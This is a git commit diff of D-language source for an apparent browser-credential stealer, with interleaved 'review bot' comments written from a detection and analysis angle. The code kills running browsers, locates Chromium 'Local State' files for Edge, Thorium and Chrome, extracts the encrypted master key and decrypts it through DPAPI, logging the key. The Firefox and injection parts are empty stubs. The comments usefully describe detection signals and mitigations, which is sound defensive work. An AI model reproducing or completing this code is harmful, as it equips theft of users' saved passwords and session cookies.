Initiliazation

2025-12-22 16:23:48 +01:00
parent 7a8b6d451d
commit b29e6179f3
165 changed files with 28070 additions and 0 deletions


@@ -0,0 +1,64 @@
module angel.exfil.browser.browser;
// Internal imports
import angel.utils.logging;
import angel.utils.utils;
import angel.config : config;
import angel.utils.constants;
import angel.exfil.browser.inject;
import angel.exfil.browser.chromium.chromium;
import angel.exfil.browser.gecko.gecko;
// External imports
import std.path;
import std.stdio;
import std.file;
import core.thread.osthread;
// TODO fix process killing
// BUG doesn't equally loop through set of procs, just operates on last one
class Browser {
this() {
Logger.log(LogLevel.Event, "Initializing browser...");
string[] procs = ["firefox.exe", "chrome.exe", "msedge.exe"];
if (!config.debug_mode) {
Utils.killproc(procs);
}
string browser_path = buildPath(Constants.workdir, "Browser");
if (!exists(browser_path)) {
mkdir(browser_path);
}
Logger.log(LogLevel.Event, "Initialized browser.");
}
public void run() {
Thread[] threads;
if (config.exfil.browser.gecko) {
auto t = new Thread(() => new Gecko().entry());
threads ~= t;
Logger.log(LogLevel.Event, "Running thread gecko...");
t.start();
}
else if (config.exfil.browser.chromium) {
auto t = new Thread(() => new Chromium().entry());
threads ~= t;
Logger.log(LogLevel.Event, "Running thread chromium...");
t.start();
} else if (config.exfil.browser.inject) {
auto t = new Thread(() => new Inject().inject());
threads ~= t;
Logger.log(LogLevel.Event, "Running thread browser inject...");
t.start();
}
foreach (t; threads) {
joinLowLevelThread(t.id);
}
}
}
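Review bot: The `Browser` constructor has no comment stating its side effects, which are what an analyst or detection engineer needs first. Unless `config.debug_mode` is set, it passes `firefox.exe`, `chrome.exe` and `msedge.exe` to `Utils.killproc` (defined outside this section, presumably process termination) and then creates a `Browser` directory under `Constants.workdir`. I would record that above the class, e.g. `// Side effects: ends firefox.exe/chrome.exe/msedge.exe unless debug_mode; creates <workdir>\Browser (apparently a staging directory)`. On the defensive side, a non-browser process ending all three browser images in a row and then creating such a folder is a behavioural signal that does not depend on the file hash.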


@@ -0,0 +1,77 @@
module angel.exfil.browser.chromium.chromium;
// Internal imports
import angel.utils.constants;
import angel.utils.logging;
import angel.exfil.browser.chromium.dpapi;
// External imports
import std.stdio;
import std.string;
import std.file;
import std.base64;
import std.Path;
import std.format;
import std.json;
class Chromium {
private {
string localst;
string[] profs = ["Default", "Profile 1", "Profile 2", "Profile 3", "Profile 4", "Profile 5"];
string[] paths = ["Microsoft\\Edge", "Thorium", "Google\\Chrome"];
}
public void entry() {
Logger.log(LogLevel.Debug, "Entered chromium");
foreach (path; paths) {
string pat = buildPath(Constants.local_appdata, path, "User Data");
if (exists(pat)) {
Logger.log(LogLevel.Debug, format("Browser dir %s exists", pat));
this.localst = buildPath(pat, "Local State");
if (exists(localst)) {
Logger.log(LogLevel.Debug, format("Local State file %s exists for browser %s", localst, pat));
ubyte[] master_key = this.mkey();
if (master_key is null || master_key.length == 0) {
Logger.log(
LogLevel.Debug,
"Master key contains 0 bytes, possible uncaught/unknown error. Skipping..."
);
Logger.log(LogLevel.Debug, format("%s", master_key));
return;
} else {
Logger.log(LogLevel.Debug, format("Decrypted master key: %s", master_key));
}
foreach(prof; profs) {
string profpat = buildPath(pat, prof);
if (exists(profpat)) {
Logger.log(LogLevel.Debug, format("Profile %s exists for browser %s", prof, pat));
}
}
}
}
}
}
private ubyte[] mkey() {
string bjson = readText(this.localst);
JSONValue json = parseJSON(bjson);
string encoded = json["os_crypt"]["encrypted_key"].str;
ubyte[] bdecoded = Base64.decode(encoded.strip());
ubyte[] bkey_crypt = bdecoded[5 .. $];
ubyte[] dat = dpapi(bkey_crypt);
return dat;
}
}
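Review bot: `entry()` and `mkey()` carry no documentation of what data they touch, and the debug branch writes the decrypted key into the log via `format("Decrypted master key: %s", master_key)`. As written, the code looks under `Constants.local_appdata` for `Microsoft\Edge`, `Thorium` and `Google\Chrome`, reads `User Data\Local State`, takes `os_crypt.encrypted_key`, Base64-decodes it, drops the first 5 bytes and hands the rest to `dpapi()`; the profile loop only logs which profile directories exist. A comment to that effect belongs above `mkey()`, e.g. `// Reads os_crypt.encrypted_key from Local State and unwraps it with DPAPI in the current user's context`. For defenders, the relevant telemetry is a non-browser process opening `Local State` followed by a DPAPI unprotect call. Any log file recovered from this sample during incident response should be handled as containing key material.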


@@ -0,0 +1,46 @@
module angel.exfil.browser.chromium.dpapi;
// Internal imports
import angel.utils.logging;
// External imports
import core.sys.windows.windows;
import core.stdc.stdlib;
import std.string;
extern(Windows)
{
BOOL CryptUnprotectData(
const(DATA_BLOB)* pDataIn,
LPCWSTR* ppszDataDescr,
const(DATA_BLOB)* pOptionalEntropy,
void* pvReserved,
void* pPromptStruct,
uint dwFlags,
DATA_BLOB* pDataOut
);
}
extern(Windows)
struct DATA_BLOB
{
uint cbData;
ubyte* pbData;
}
ubyte[] dpapi(ubyte[] key_crypt) {
DATA_BLOB inBlob;
DATA_BLOB outBlob;
inBlob.pbData = key_crypt.ptr;
inBlob.cbData = cast(uint) key_crypt.length;
if (CryptUnprotectData(&inBlob, null, null, null, null, 0, &outBlob)) {
ubyte[] decrypted = cast(ubyte[])(outBlob.pbData[0 .. outBlob.cbData]).idup;
free(outBlob.pbData);
return decrypted;
} else {
return [];
}
}
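Review bot: `dpapi()` is undocumented, and the fact worth stating is that `CryptUnprotectData` is called with no optional entropy, no prompt struct and `dwFlags` of 0, so the call depends only on running as the logged-on user. I would note that above the function, e.g. `// DPAPI unwrap in the caller's user context; returns [] on failure`. This is why user-scoped DPAPI protection on its own does not separate the browser from other code running as the same user. Mitigations to weigh are application-bound key protection such as Chrome's App-Bound Encryption, and alerting on DPAPI unprotect activity from processes other than the browser itself.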


@@ -0,0 +1,2 @@
module angel.exfil.browser.chromium.inject;


@@ -0,0 +1,20 @@
module angel.exfil.browser.gecko.gecko;
// Internal imports
import angel.utils.logging;
// External imports
import std.stdio;
class Gecko {
this() {
}
private {
}
public void entry() {
Logger.log(LogLevel.Debug, "Entered gecko");
}
}


@@ -0,0 +1,2 @@
module angel.exfil.browser.gecko.injection;


@@ -0,0 +1,15 @@
module angel.exfil.browser.inject;
class Inject {
this() {
}
private {
}
void inject() {
}
}